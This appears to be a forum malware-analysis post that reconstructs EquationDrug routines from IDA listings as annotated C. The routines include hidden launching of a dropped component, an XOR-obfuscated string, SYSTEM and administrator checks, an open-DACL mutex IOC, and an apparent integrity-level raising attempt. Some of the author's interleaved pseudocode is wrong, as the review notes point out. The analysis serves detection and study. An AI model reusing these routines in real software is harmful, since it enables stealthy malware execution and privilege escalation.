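/*
 * sub_401810 - run the dropped component named by lpApplicationName.
 *
 * lpApplicationName is the function's single argument (arg_0 = [ebp+8] in
 * the listing); the author's version allocated it with new[], which the
 * listing never does.  var_8 holds the bytes 51 1B 13 13 00; sub_401050
 * XORs them with 0x7F (via sub_401000) and the result is ".dll" -- the
 * marker only ever exists decoded on the stack.
 *
 * If the name contains ".dll" the component is mapped into this process
 * with LoadLibraryA, so its DllMain runs here.  The failure code is only
 * compared with 0x45A (ERROR_DLL_INIT_FAILED); both outcomes just return.
 * Otherwise the file is started as a child process with a hidden window
 * (dwFlags = 1 = STARTF_USESHOWWINDOW, wShowWindow = 0 = SW_HIDE) and
 * inheritable handles.  The handles in ProcessInformation are never closed
 * in the listing.
 */
void sub_401810(char *lpApplicationName)
{
    struct _STARTUPINFOA StartupInfo;
    struct _PROCESS_INFORMATION ProcessInformation;
    char var_8[5];
    void *var_C;
    DWORD var_10;

    var_8[0] = 0x51;
    var_8[1] = 0x1B;
    var_8[2] = 0x13;
    var_8[3] = 0x13;
    var_8[4] = 0;                           /* the listing's var_4 */

    sub_401050(var_8);                      /* var_8 is now ".dll" */

    if (strstr(lpApplicationName, var_8) != 0) {
        var_C = LoadLibraryA(lpApplicationName);
        if (var_C == 0) {
            var_10 = GetLastError();
            if (var_10 == 0x45A) {          /* ERROR_DLL_INIT_FAILED */
                /* loc_401872: same exit as every other error */
            }
        }
        return;
    }

    /* loc_401874: not a DLL -> spawn it hidden */
    GetStartupInfoA(&StartupInfo);
    StartupInfo.wShowWindow = 0;            /* SW_HIDE */
    StartupInfo.dwFlags = 1;                /* STARTF_USESHOWWINDOW */
    CreateProcessA(lpApplicationName, 0, 0, 0, 1, 0, 0, 0,
                   &StartupInfo, &ProcessInformation);
}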

Код:
/*
sub_401810 proc	near
; NOTE(review): launches the dropped component.  Decodes ".dll" from the
; bytes in var_8 (XOR 0x7F in sub_401050); if lpApplicationName contains it
; the file is LoadLibrary'd into this process, otherwise it is started as a
; hidden child process.  lpApplicationName is the function's argument, not
; a heap buffer as in the author's pseudocode.


StartupInfo= _STARTUPINFOA ptr -68h
ProcessInformation= _PROCESS_INFORMATION ptr -20h
var_10=	dword ptr -10h
var_C= dword ptr -0Ch
var_8= byte ptr	-8
var_5= byte ptr	-5
var_4= byte ptr	-4
lpApplicationName= dword ptr  8
; var_8..var_4 = 5 bytes: the obfuscated ".dll" plus its NUL

push	ebp
mov	ebp, esp
sub	esp, 68h
mov	[ebp+var_8], 51h
mov	byte ptr [ebp-7], 1Bh
mov	byte ptr [ebp-6], 13h
mov	[ebp+var_5], 13h
mov	[ebp+var_4], 0
; 51h^7Fh='.', 1Bh^7Fh='d', 13h^7Fh='l', 13h^7Fh='l' -> ".dll"

var_8 = new char[4];

var_8[0] = 0x51;
var_8[1] = 0x1B;
var_8[2] = 0x13;
var_8[3] = 0x13;
var_8[4] = 0;
var_5 = 0x13;
var_4 = 0;

; NOTE(review): the four stores below repeat the ones above; this looks like
; a duplicated paste in the post rather than code in the binary -- confirm
; against the addresses in IDA
mov	byte ptr [ebp-7], 1Bh
mov	byte ptr [ebp-6], 13h
mov	[ebp+var_5], 13h
mov	[ebp+var_4], 0

lea	eax,[ebp+var_8]
push	eax		; char *
call	sub_401050
; sub_401050 -> sub_401000(var_8, 0x7F): decode in place

sub_401050(&var_8);

add	esp, 4
lea	ecx, [ebp+var_8]
push	ecx		; char *
mov	edx, [ebp+lpApplicationName]
push	edx		; char *
call	ds:strstr

strstr(lpApplicationName, &var_8);

add	esp, 8
test	eax, eax
jz	short loc_401874
; ".dll" found in the name: load it into this process (its DllMain runs here)
mov	eax, [ebp+lpApplicationName]
push	eax		; lpLibFileName
call	ds:LoadLibraryA

LoadLibraryA(lpApplicationName);

mov	[ebp+var_C], eax
cmp	[ebp+var_C], 0
jnz	short loc_401872
call	ds:GetLastError

GetLastError();

var_10 = GetLastError()

mov	[ebp+var_10], eax
cmp	[ebp+var_10], 45Ah
; 45Ah = ERROR_DLL_INIT_FAILED; both branches end at loc_4018AB anyway

if (var10 != 0x45A)
{ jz	short loc_401872 }

jz	short loc_401872
jmp	short loc_4018AB

loc_401872:
jmp	short loc_4018AB

loc_401874:
; not a DLL: start it as a hidden child process
lea	ecx, [ebp+StartupInfo]
push	ecx		; lpStartupInfo
call	ds:GetStartupInfoA

GetStartupInfoA(&StartupInfo);

mov	[ebp+StartupInfo.wShowWindow], 0
mov	[ebp+StartupInfo.dwFlags], 1
; wShowWindow 0 = SW_HIDE, dwFlags 1 = STARTF_USESHOWWINDOW

StartupInfo.wShowWindow = 0;
StartupInfo.dwFlags = 1;

lea	edx, [ebp+ProcessInformation]
push	edx		; lpProcessInformation
lea	eax, [ebp+StartupInfo]
push	eax		; lpStartupInfo
push	0		; lpCurrentDirectory
push	0		; lpEnvironment
push	0		; dwCreationFlags
push	1		; bInheritHandles
; child inherits this process' inheritable handles
push	0		; lpThreadAttributes
push	0		; lpProcessAttributes
push	0		; lpCommandLine
mov	ecx, [ebp+lpApplicationName]
push	ecx		; lpApplicationName
call	ds:CreateProcessA
; hProcess/hThread in ProcessInformation are never closed

CreateProcessA(lpApplicationName, 0,0,0,1,0,0,0,&StartupInfo, &ProcessInformation);

loc_4018AB:
mov	esp, ebp
pop	ebp
retn
sub_401810 endp

align 10h
*/
Код:
/* sub_401050 - decode/encode a string in place with the sample's 0x7F XOR
 * key.  With this key the bytes 51 1B 13 13 in sub_401810 become ".dll". */
void sub_401050(char * arg_0)
{
    const int key = 0x7f;
    sub_401000(arg_0, key);
}
Код:
/* sub_401070 - same in-place XOR as sub_401050 but with key 0x3C; no
 * caller is shown on this page, so which string it decodes is unknown. */
void sub_401070(char * arg_0)
{
    const int key = 0x3c;
    sub_401000(arg_0, key);
}
Код:
/* sub_401760 - cleanup stub.  No listing for it is on this page; the two
 * commented-out calls are the author's guess at what it does, not
 * reconstructed code. */
void sub_401760() 
{
//LocalFree(hMem);
//FreeLibrary(hLibModule);
}
Код:
/* sub_401A38 - cleanup chunk called at sub_401920's common exit
 * (loc_401A2A).  Its listing is not on this page; the commented-out body is
 * the author's guess (freeing a pSid that is still allocated on the failure
 * path), not reconstructed code. */
void sub_401A38() 
{ 
//if (pSid==0)
//return;
//FreeSid(pSid);
}

Получение системного времени (EquationDrug). На самом деле функция вычисляет (секунды % 10) / dbl_4091F0 и оставляет результат в st(0); в псевдокоде автора эта арифметика потеряна. Значение константы dbl_4091F0 и назначение результата по листингу не видны.

Код:
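/*
 * sub_4018B0 - (current UTC second % 10) / dbl_4091F0, left in st(0), i.e.
 * a double return value.
 *
 * The author's version kept only the GetSystemTime call.  The listing does
 * movzx of wSecond, cdq / idiv by 10, stores the remainder in var_14, then
 * fild / fdiv by the double at dbl_4091F0.  The constant's value and the
 * callers are not on this page, so what the quotient is for (a jitter or
 * delay factor?) cannot be stated here -- confirm from cross-references.
 */
double sub_4018B0(void)
{
    extern const double dbl_4091F0;         /* value not shown in the listing */
    _SYSTEMTIME SystemTime;
    int var_14;

    GetSystemTime(&SystemTime);
    var_14 = (int)SystemTime.wSecond % 10;  /* cdq + idiv ecx (ecx = 0Ah); edx = remainder */
    return (double)var_14 / dbl_4091F0;     /* fild [var_14] / fdiv ds:dbl_4091F0 */
}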
Код:

/*
sub_4018B0 proc	near
; NOTE(review): returns (wSecond % 10) / dbl_4091F0 in st(0).  The author's
; pseudocode dropped everything after GetSystemTime.

var_14=	dword ptr -14h
SystemTime= _SYSTEMTIME	ptr -10h

push	ebp
mov	ebp, esp
sub	esp, 14h
lea	eax, [ebp+SystemTime]
push	eax		; lpSystemTime
call	ds:GetSystemTime
movzx	eax, [ebp+SystemTime.wSecond]
cdq
; edx:eax = wSecond (sign-extended for the signed divide)
mov	ecx, 0Ah
idiv	ecx
; eax = wSecond / 10, edx = wSecond % 10
mov	[ebp+var_14], edx
fild	[ebp+var_14]
fdiv	ds:dbl_4091F0
; st(0) = (wSecond % 10) / dbl_4091F0 -- constant value not on this page
mov	esp, ebp
pop	ebp
retn
sub_4018B0 endp

align 10h

*/

Проверка, запущен ли код от имени LocalSystem (EquationDrug). Строится SID S-1-5-18 (authority 5 = NT, RID 0x12 = 18 = SECURITY_LOCAL_SYSTEM_RID), через LookupAccountSidW получается его имя (обычно "SYSTEM") и сравнивается с результатом GetUserNameW. Результат в var_24: 1 — совпадает, 0 — нет, -1 — ошибка API.

Код:
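/*
 * sub_401A80 - does the current user name equal the LocalSystem account name?
 *
 * Builds S-1-5-18 (SECURITY_NT_AUTHORITY, SECURITY_LOCAL_SYSTEM_RID = 0x12),
 * resolves it with LookupAccountSidW (normally "SYSTEM") and compares the
 * name with GetUserNameW.  var_24 is the result: 1 when the names match,
 * 0 when they differ, -1 when any API call fails (the listing's neg/sbb/inc
 * sequence turns wcscmp's 0 into 1).  var_18 / var_10 / var_4 are the SEH
 * frame and are omitted.
 *
 * The listing ends in `call sub_401BF5; jmp loc_401C13` (cleanup chunk, not
 * shown); sub_401CA0 tests eax afterwards, so var_24 is assumed to be the
 * return value -- confirm.  FreeSid is presumably done in sub_401BF5.
 * Buffer sizes follow the listing's frame: nSize 0x100 wide chars, cbName
 * 0x40, cbReferencedDomainName 0x80.  The listing's `Sid = &var_90` is dead:
 * AllocateAndInitializeSid overwrites Sid immediately.
 */
int sub_401A80(void)
{
    wchar_t Buffer[0x100];
    wchar_t Name[0x46];                  /* 0x8C bytes in the frame; 0x82 are memset */
    wchar_t ReferencedDomainName[0x84];
    DWORD nSize = 0x100;
    DWORD cbName = 0x40;
    DWORD cbReferencedDomainName = 0x80;
    _SID_IDENTIFIER_AUTHORITY pIdentifierAuthority;
    PSID Sid = 0;
    SID_NAME_USE peUse;
    int var_24 = -1;
    int i;

    if (!GetUserNameW(Buffer, &nSize))
        return -1;

    for (i = 0; i < 5; i++)
        pIdentifierAuthority.Value[i] = 0;
    pIdentifierAuthority.Value[5] = 5;   /* SECURITY_NT_AUTHORITY */

    /* S-1-5-18, LocalSystem */
    if (!AllocateAndInitializeSid(&pIdentifierAuthority, 1, 0x12,
                                  0, 0, 0, 0, 0, 0, 0, &Sid))
        return -1;

    memset(Name, 0, 0x82);
    if (!LookupAccountSidW(0, Sid, Name, &cbName, ReferencedDomainName,
                           &cbReferencedDomainName, &peUse))
        return -1;

    var_24 = (wcscmp(Name, Buffer) == 0) ? 1 : 0;   /* neg / sbb / inc */
    return var_24;
}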
Код:
/*
sub_401A80 proc	near
; NOTE(review): "is the current user LocalSystem?"  Builds S-1-5-18, looks
; up its account name and compares it with GetUserNameW.  var_24 = 1 match,
; 0 mismatch, -1 API failure.  SEH frame as in sub_402330.  The return path
; is the chunk at 00401C13 (not shown); sub_401CA0 tests eax afterwards, so
; var_24 is presumably returned -- confirm.

cbReferencedDomainName=	dword ptr -444h
Buffer=	word ptr -440h
cbName=	dword ptr -234h
pIdentifierAuthority= _SID_IDENTIFIER_AUTHORITY	ptr -230h
ReferencedDomainName= word ptr -228h
Name= word ptr -120h
nSize= dword ptr -94h
var_90=	dword ptr -90h
peUse= dword ptr -28h
var_24=	dword ptr -24h
Sid= dword ptr -20h
var_1C=	dword ptr -1Ch
var_18=	dword ptr -18h
var_10=	dword ptr -10h
var_4= dword ptr -4

; FUNCTION CHUNK AT 00401C13 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00401C33 SIZE 00000014 BYTES

push	ebp
mov	ebp, esp
push	0FFFFFFFFh
push	offset unk_409210
push	offset sub_407BC0
mov	eax, large fs:0
push	eax
mov	large fs:0, esp
add	esp, 0FFFFFBCCh
push	ebx
push	esi
push	edi
mov	[ebp+var_18], esp
mov	[ebp+var_24], 0FFFFFFFFh
; var_24 = -1: the "API failed" result until proven otherwise
mov	[ebp+var_1C], 0
mov	[ebp+Sid], 0
mov	[ebp+var_4], 0
mov	[ebp+var_4], 1
mov	[ebp+nSize], 100h

var_18 = 0;
var_24 = 0xFFFFFFFF;
var_1C = 0;
Sid = 0;
var_4 = 1;
nSize = 0x100;

lea	eax, [ebp+nSize]
push	eax		; nSize
lea	ecx, [ebp+Buffer]
push	ecx		; lpBuffer
call	ds:GetUserNameW

GetUserNameW(&Buffer, &nSize);

test	eax, eax
jnz	short loc_401AFA
mov	[ebp+var_24], 0FFFFFFFFh

var_24 = 0xFFFFFFFF;

jmp	loc_401BE7

loc_401AFA:
mov	[ebp+pIdentifierAuthority.Value], 0
mov	[ebp+pIdentifierAuthority.Value+1], 0
mov	[ebp+pIdentifierAuthority.Value+2], 0
mov	[ebp+pIdentifierAuthority.Value+3], 0
mov	[ebp+pIdentifierAuthority.Value+4], 0
mov	[ebp+pIdentifierAuthority.Value+5], 5
; {0,0,0,0,0,5} = SECURITY_NT_AUTHORITY

pIdentifierAuthority.Value[0]=0;
pIdentifierAuthority.Value[1]=0;
pIdentifierAuthority.Value[2]=0;
pIdentifierAuthority.Value[3]=0;
pIdentifierAuthority.Value[4]=0;
pIdentifierAuthority.Value[5]=5;

lea	edx, [ebp+var_90]
mov	[ebp+Sid], edx
; dead store: AllocateAndInitializeSid overwrites Sid right below

Sid = &var_90;

lea	eax, [ebp+Sid]
push	eax		; pSid
push	0		; nSubAuthority7
push	0		; nSubAuthority6
push	0		; nSubAuthority5
push	0		; nSubAuthority4
push	0		; nSubAuthority3
push	0		; nSubAuthority2
push	0		; nSubAuthority1
push	12h		; nSubAuthority0
; 12h = 18 = SECURITY_LOCAL_SYSTEM_RID -> S-1-5-18 (LocalSystem)
push	1		; nSubAuthorityCount
lea	ecx, [ebp+pIdentifierAuthority]
push	ecx		; pIdentifierAuthority
call	ds:AllocateAndInitializeSid ; Allocate and initializes a security
			; identifier with up to	eight subauthorities

AllocateAndInitializeSid(&pIdentifierAuthority, 1, 0x12, 0,0,0,0,0,0,0,&Sid);

mov	[ebp+var_1C], eax
cmp	[ebp+var_1C], 0
jnz	short loc_401B65
mov	[ebp+var_24], 0FFFFFFFFh
jmp	loc_401BE7

loc_401B65:		; size_t
push	82h
push	0		; int
lea	edx, [ebp+Name]
push	edx		; void *
call	memset
add	esp, 0Ch

memset(&Name, 0, 0x82);

mov	[ebp+cbName], 40h
mov	[ebp+cbReferencedDomainName], 80h

cbName = 0x40;
cbReferencedDomainName = 0x80;

lea	eax, [ebp+peUse]
push	eax		; peUse
lea	ecx, [ebp+cbReferencedDomainName]
push	ecx		; cbReferencedDomainName
lea	edx, [ebp+ReferencedDomainName]
push	edx		; ReferencedDomainName
lea	eax, [ebp+cbName]
push	eax		; cbName
lea	ecx, [ebp+Name]
push	ecx		; Name
mov	edx, [ebp+Sid]
push	edx		; Sid
push	0		; lpSystemName
call	ds:LookupAccountSidW
; Name <- account name of S-1-5-18 (normally "SYSTEM", but localisable,
; which is why the sample resolves it instead of hard-coding it)

LookupAccountSidW(0, Sid, &Name, &cbName, &ReferencedDomainName, &cbReferencedDomainName, &peUse);

test	eax, eax
jnz	short loc_401BC8
mov	[ebp+var_24], 0FFFFFFFFh
jmp	short loc_401BE7

loc_401BC8:
lea	eax, [ebp+Buffer]
push	eax		; wchar_t *
lea	ecx, [ebp+Name]
push	ecx		; wchar_t *
call	ds:wcscmp

wcscmp(&Name, &Buffer);

add	esp, 8
neg	eax
sbb	eax, eax
inc	eax
; eax = (wcscmp result == 0) ? 1 : 0
mov	[ebp+var_24], eax

loc_401BE7:
mov	[ebp+var_4], 0
call	sub_401BF5
; cleanup chunk (not shown) -- presumably FreeSid(Sid)
jmp	short loc_401C13
sub_401A80 endp

*/

Создание именованного мьютекса "prkMtx" (EquationDrug). Имя мьютекса — готовый индикатор компрометации для правил обнаружения. Дескриптор безопасности только инициализируется (revision 1), DACL к нему не добавляется, поэтому объект создаётся фактически без DACL и доступен любому пользователю.

Код:
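/*
 * sub_401C50 - create the named mutex "prkMtx" (a usable host-based IOC).
 *
 * The security descriptor is initialised with revision 1 and nothing else
 * is set on it -- no DACL is ever attached -- so the mutex is created with
 * an absent (NULL) DACL and is reachable from any account; presumably so
 * other instances/sessions can detect or signal it.  Confirm on a live box
 * with `accesschk` or similar.
 *
 * Returns the mutex handle, or 0 if InitializeSecurityDescriptor fails
 * (loc_401C8D); the author's version returned nothing and passed a narrow
 * literal to the wide API.  pSecurityDescriptor is a SECURITY_DESCRIPTOR
 * (0x14 bytes at -14h), not a DWORD.  nLength 0xC is
 * sizeof(SECURITY_ATTRIBUTES) on x86.
 */
HANDLE sub_401C50(void)
{
    _SECURITY_ATTRIBUTES MutexAttributes;
    SECURITY_DESCRIPTOR pSecurityDescriptor;

    if (!InitializeSecurityDescriptor(&pSecurityDescriptor, 1))  /* SECURITY_DESCRIPTOR_REVISION */
        return 0;

    MutexAttributes.nLength = 0xC;
    MutexAttributes.bInheritHandle = 0;
    MutexAttributes.lpSecurityDescriptor = &pSecurityDescriptor;  /* no DACL set on it */
    return CreateMutexW(&MutexAttributes, 0, L"prkMtx");
}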
Код:
/*
; Attributes: bp-based frame
; NOTE(review): creates the named mutex "prkMtx" with a security descriptor
; that has no DACL -- i.e. the object is open to every account.  The name
; is a usable indicator of compromise.  eax = mutex handle, 0 if
; InitializeSecurityDescriptor fails.

sub_401C50 proc	near

MutexAttributes= _SECURITY_ATTRIBUTES ptr -20h
pSecurityDescriptor= dword ptr -14h
; pSecurityDescriptor is really a 20-byte SECURITY_DESCRIPTOR (-14h..0)

push	ebp
mov	ebp, esp
sub	esp, 20h
push	1		; dwRevision
lea	eax, [ebp+pSecurityDescriptor]
push	eax		; pSecurityDescriptor
call	ds:InitializeSecurityDescriptor
; descriptor now has no owner, group, SACL or DACL; nothing is added later

InitializeSecurityDescriptor(&pSecurityDescriptor, 1);

test	eax, eax
jz	short loc_401C8D
mov	[ebp+MutexAttributes.nLength], 0Ch
; 0Ch = sizeof(SECURITY_ATTRIBUTES) on x86
mov	[ebp+MutexAttributes.bInheritHandle], 0
lea	ecx, [ebp+pSecurityDescriptor]


mov	[ebp+MutexAttributes.lpSecurityDescriptor], ecx
; this assignment is missing from the author's pseudocode
push	offset Name	; "prkMtx"
; wide string (CreateMutexW), the pseudocode shows a narrow literal
push	0		; bInitialOwner
lea	edx, [ebp+MutexAttributes]
push	edx		; lpMutexAttributes
call	ds:CreateMutexW
; eax = handle (also returned if the mutex already existed)

CreateMutexW(&MutexAttributes, 0, "prkMtx");

jmp	short loc_401C8F

loc_401C8D:
xor	eax, eax
; return 0 on InitializeSecurityDescriptor failure

loc_401C8F:
mov	esp, ebp
pop	ebp
retn
sub_401C50 endp

align 10h

*/

Основная проверка привилегий (EquationDrug). На NT-системах (dwPlatformId == 2) вызываются sub_401920 (член Administrators?) и sub_401A80 (запущен как SYSTEM?); если ни то ни другое — создаётся мьютекс "prkMtx" и вызывается sub_404639(pid, …) (листинг не приведён). Затем на Vista+ (dwMajorVersion >= 6) через sub_402000 читается уровень целостности токена; если он ниже High (0x4000), строятся SID-ы меток целостности S-1-16-<текущий> и S-1-16-0x4000 (authority 0x10 = SECURITY_MANDATORY_LABEL_AUTHORITY), снова создаётся мьютекс и вызывается sub_405012(pid, pSid, var_20, 0, 0, 0). Тело sub_405012 не показано; по аргументам это похоже на попытку изменить уровень целостности процесса — гипотеза, требует проверки.

Код:
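/*
 * sub_401CA0 - privilege check / setup run on NT systems.
 *
 * Reconstructed from the listing below (the author's version stopped after
 * the two SID allocations and mis-read the memset as operating on the PID).
 * var_C4 is the success flag; the epilogue is a function chunk at 00401FC4
 * not on this page, so var_C4 is assumed to be the return value -- confirm.
 * var_BC holds GetCurrentProcessId().  The common exit calls sub_401F57
 * (cleanup, not shown).  dword_40B118 is a global holding the mutex handle.
 *
 *   1. GetVersionExA; anything but the NT family (dwPlatformId == 2) is a
 *      no-op returning 1.
 *   2. If neither sub_401920 (Administrators member) nor sub_401A80
 *      (LocalSystem) says yes: create the "prkMtx" mutex (sub_401C50), call
 *      sub_404639(pid, &var_CC) -- body not shown; non-zero is failure and
 *      leaves the mutex open -- then close the mutex.
 *   3. On Vista+ (dwMajorVersion >= 6): sub_402000 returns the token's
 *      integrity RID.  0xFFFFFFFF is failure; >= 0x4000
 *      (SECURITY_MANDATORY_HIGH_RID, unsigned compare) ends the routine.
 *      Below that, two mandatory-label SIDs are built with authority 0x10
 *      (SECURITY_MANDATORY_LABEL_AUTHORITY): S-1-16-<current> and
 *      S-1-16-0x4000, the mutex is created again and
 *      sub_405012(pid, pSid, var_20, 0, 0, 0) is called.  Its body is not
 *      shown; the argument set suggests an attempt to move the process from
 *      its current integrity level to High -- treat as a hypothesis.
 *
 * The SEH frame (var_4/var_18/var_10) is omitted.
 */
DWORD sub_401CA0(void)
{
    _OSVERSIONINFOA VersionInformation;
    _SID_IDENTIFIER_AUTHORITY pIdentifierAuthority;
    PSID pSid = 0;                  /* S-1-16-<current integrity RID> */
    PSID var_20 = 0;                /* S-1-16-0x4000 (High) */
    DWORD nSubAuthority0 = 0;       /* current integrity RID from sub_402000 */
    DWORD var_C4 = 1;               /* result flag */
    DWORD var_BC;                   /* own PID */
    DWORD var_CC = 0;
    DWORD var_C8;
    HANDLE hObject;
    int i;

    var_BC = GetCurrentProcessId();
    memset(&VersionInformation, 0, 0x94);        /* the struct, not the PID */
    VersionInformation.dwOSVersionInfoSize = 0x94;
    if (!GetVersionExA(&VersionInformation))
        return 0;
    if (VersionInformation.dwPlatformId != 2)    /* VER_PLATFORM_WIN32_NT only */
        return var_C4;

    if (sub_401920() != 0 || sub_401A80() != 0) {
        var_C4 = 1;                              /* loc_401E12 */
    } else {
        dword_40B118 = sub_401C50();
        if (dword_40B118 != 0) {
            var_C8 = sub_404639(var_BC, &var_CC);
            if (var_C8 != 0) {
                GetLastError();                  /* result discarded in the listing */
                return 0;                        /* mutex handle NOT closed on this path */
            }
            var_C4 = 1;
        } else {
            var_C4 = 0;                          /* loc_401DD1 */
        }
        if (dword_40B118 != 0) {                 /* loc_401DDB: release the mutex */
            hObject = dword_40B118;
            if (hObject != 0)
                CloseHandle(hObject);
            dword_40B118 = 0;
        }
    }

    /* loc_401E1C */
    if (VersionInformation.dwMajorVersion < 6)   /* pre-Vista: no integrity levels */
        return var_C4;

    nSubAuthority0 = sub_402000();
    if (nSubAuthority0 == 0xFFFFFFFF)
        return 0;
    if (nSubAuthority0 >= 0x4000)                /* jnb: already High or System */
        return var_C4;

    for (i = 0; i < 5; i++)
        pIdentifierAuthority.Value[i] = 0;
    pIdentifierAuthority.Value[5] = 0x10;        /* SECURITY_MANDATORY_LABEL_AUTHORITY */

    if (!AllocateAndInitializeSid(&pIdentifierAuthority, 1, nSubAuthority0,
                                  0, 0, 0, 0, 0, 0, 0, &pSid)) {
        GetLastError();
        return 0;
    }
    if (!AllocateAndInitializeSid(&pIdentifierAuthority, 1, 0x4000,
                                  0, 0, 0, 0, 0, 0, 0, &var_20)) {
        GetLastError();
        return 0;
    }

    dword_40B118 = sub_401C50();
    if (dword_40B118 == 0)
        return 0;                                /* loc_401F3F */
    if (sub_405012(var_BC, pSid, var_20, 0, 0, 0) != 0)
        return 0;
    return var_C4;                               /* loc_401F3D -> exit */
}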
Код:
/*

; Attributes: bp-based frame
; NOTE(review): top-level privilege check.  NT only.  If the caller is
; neither an Administrators member (sub_401920) nor LocalSystem
; (sub_401A80): create "prkMtx", call sub_404639(pid, ...) and close the
; mutex.  Then on Vista+ read the token integrity RID (sub_402000); if it is
; below 0x4000 (High), build the mandatory-label SIDs S-1-16-<current> and
; S-1-16-0x4000 and hand them with the PID to sub_405012 (not shown; looks
; like an integrity-level change attempt -- hypothesis).  var_C4 = result
; flag; the epilogue chunk at 00401FC4 is not on this page.  SEH frame as in
; sub_402330.

sub_401CA0 proc	near

hObject= dword ptr -0F8h
pIdentifierAuthority= _SID_IDENTIFIER_AUTHORITY	ptr -0D4h
var_CC=	dword ptr -0CCh
var_C8=	dword ptr -0C8h
var_C4=	dword ptr -0C4h
pSid= dword ptr	-0C0h
var_BC=	dword ptr -0BCh
VersionInformation= _OSVERSIONINFOA ptr	-0B8h
var_20=	dword ptr -20h
nSubAuthority0=	dword ptr -1Ch
var_18=	dword ptr -18h
var_10=	dword ptr -10h
var_4= dword ptr -4
; var_C4 = result, var_BC = own PID, pSid / var_20 = mandatory-label SIDs,
; nSubAuthority0 = current integrity RID

; FUNCTION CHUNK AT 00401FC4 SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00401FE7 SIZE 00000017 BYTES

push	ebp
mov	ebp, esp
push	0FFFFFFFFh
push	offset unk_409238
push	offset sub_407BC0
mov	eax, large fs:0
push	eax
mov	large fs:0, esp
add	esp, 0FFFFFEF4h
push	ebx
push	esi
push	edi
mov	[ebp+var_18], esp
mov	[ebp+var_C4], 1
mov	[ebp+var_20], 0
mov	[ebp+pSid], 0
mov	[ebp+nSubAuthority0], 0
mov	[ebp+var_4], 0
mov	[ebp+var_4], 1

var_18=0;
var_C4=1;
var_20=0;
pSid=0;
nSubAuthority0=0;
var_4=0;
var_4=1;

call	ds:GetCurrentProcessId
mov	[ebp+var_BC], eax
; var_BC = own PID; it is NOT the memset target as the gloss below says
push	94h		; size_t
push	0		; int
lea	eax, [ebp+VersionInformation]
push	eax		; void *
call	memset

memset(GetCurrentProcessId(), 0, 0x94);

add	esp, 0Ch
mov	[ebp+VersionInformation.dwOSVersionInfoSize], 94h

VersionInformation.dwOSVersionInfoSize = 0x94;

lea	ecx, [ebp+VersionInformation]
push	ecx		; lpVersionInformation
call	ds:GetVersionExA ; Get extended	information about the
			; version of the operating system

GetVersionExA(&VersionInformation);

test	eax, eax
jnz	short loc_401D45
mov	[ebp+var_C4], 0
jmp	loc_401F49

loc_401D45:
cmp	[ebp+VersionInformation.dwPlatformId], 2
jnz	loc_401F49
; anything but the NT family: leave with var_C4 = 1
call	sub_401920
test	eax, eax
jnz	loc_401E12
; not an Administrators member -> is it LocalSystem?
call	sub_401A80
test	eax, eax
jnz	loc_401E12
; neither: create "prkMtx" and run sub_404639 on own PID (body not shown)
call	sub_401C50
mov	dword_40B118, eax
cmp	dword_40B118, 0
jz	short loc_401DD1
mov	[ebp+var_CC], 0
lea	edx, [ebp+var_CC]
push	edx
mov	eax, [ebp+var_BC]
push	eax
call	sub_404639
add	esp, 8
mov	[ebp+var_C8], eax
cmp	[ebp+var_C8], 0
jnz	short loc_401DBA
mov	[ebp+var_C4], 1
jmp	short loc_401DCF

loc_401DBA:
call	ds:GetLastError
mov	[ebp+var_C4], 0
jmp	loc_401F49
; failure exit that leaves the mutex handle in dword_40B118 open

loc_401DCF:
jmp	short loc_401DDB

loc_401DD1:
mov	[ebp+var_C4], 0

loc_401DDB:
; close the mutex before continuing to the integrity-level part
cmp	dword_40B118, 0
jz	short loc_401E10
mov	ecx, dword_40B118
mov	[ebp+hObject], ecx
cmp	[ebp+hObject], 0
jz	short loc_401E06
mov	edx, [ebp+hObject]
push	edx		; hObject
call	ds:CloseHandle

loc_401E06:
mov	dword_40B118, 0

loc_401E10:
jmp	short loc_401E1C

loc_401E12:
mov	[ebp+var_C4], 1
; admin or SYSTEM: success so far

loc_401E1C:
cmp	[ebp+VersionInformation.dwMajorVersion], 6
jb	loc_401F49
; pre-Vista has no integrity levels: done
call	sub_402000
mov	[ebp+nSubAuthority0], eax
; eax = integrity RID of own token (-1 on failure)
cmp	[ebp+nSubAuthority0], 0FFFFFFFFh
jnz	short loc_401E46
mov	[ebp+var_C4], 0
jmp	loc_401F49

loc_401E46:
cmp	[ebp+nSubAuthority0], 4000h
jnb	loc_401F49
; unsigned compare: already High (4000h) or System -> done
mov	[ebp+pIdentifierAuthority.Value], 0
mov	[ebp+pIdentifierAuthority.Value+1], 0
mov	[ebp+pIdentifierAuthority.Value+2], 0
mov	[ebp+pIdentifierAuthority.Value+3], 0
mov	[ebp+pIdentifierAuthority.Value+4], 0
mov	[ebp+pIdentifierAuthority.Value+5], 10h
; {0,0,0,0,0,16} = SECURITY_MANDATORY_LABEL_AUTHORITY (S-1-16-...)

lea	eax, [ebp+pSid]
push	eax		; pSid
push	0		; nSubAuthority7
push	0		; nSubAuthority6
push	0		; nSubAuthority5
push	0		; nSubAuthority4
push	0		; nSubAuthority3
push	0		; nSubAuthority2
push	0		; nSubAuthority1
mov	ecx, [ebp+nSubAuthority0]
push	ecx		; nSubAuthority0
; pSid = S-1-16-<current integrity RID>
push	1		; nSubAuthorityCount
lea	edx, [ebp+pIdentifierAuthority]
push	edx		; pIdentifierAuthority
call	ds:AllocateAndInitializeSid 

test	eax, eax
jnz	short loc_401EBE
call	ds:GetLastError
mov	[ebp+var_C4], 0
jmp	loc_401F49

loc_401EBE:
lea	eax, [ebp+var_20]
push	eax		; pSid
push	0
push	0
push	0
push	0
push	0
push	0
push	0
push	4000h		
; var_20 = S-1-16-0x4000, SECURITY_MANDATORY_HIGH_RID
push	1
lea	ecx, [ebp+pIdentifierAuthority]
push	ecx
call	ds:AllocateAndInitializeSid 

test	eax, eax
jnz	short loc_401EFA
call	ds:GetLastError
mov	[ebp+var_C4], 0
jmp	short loc_401F49

loc_401EFA:
call	sub_401C50
mov	dword_40B118, eax
cmp	dword_40B118, 0
jz	short loc_401F3F
push	0
push	0
push	0
mov	edx, [ebp+var_20]
push	edx
mov	eax, [ebp+pSid]
push	eax
mov	ecx, [ebp+var_BC]
push	ecx
call	sub_405012
; sub_405012(pid, S-1-16-<current>, S-1-16-High, 0, 0, 0): body not shown;
; non-zero return is treated as failure
add	esp, 18h
test	eax, eax
jz	short loc_401F3D
mov	[ebp+var_C4], 0
jmp	short loc_401F49

loc_401F3D:
jmp	short loc_401F49

loc_401F3F:
mov	[ebp+var_C4], 0

loc_401F49:
mov	[ebp+var_4], 0
call	sub_401F57
; cleanup chunk (not shown), then the epilogue at loc_401FC4
jmp	short loc_401FC4
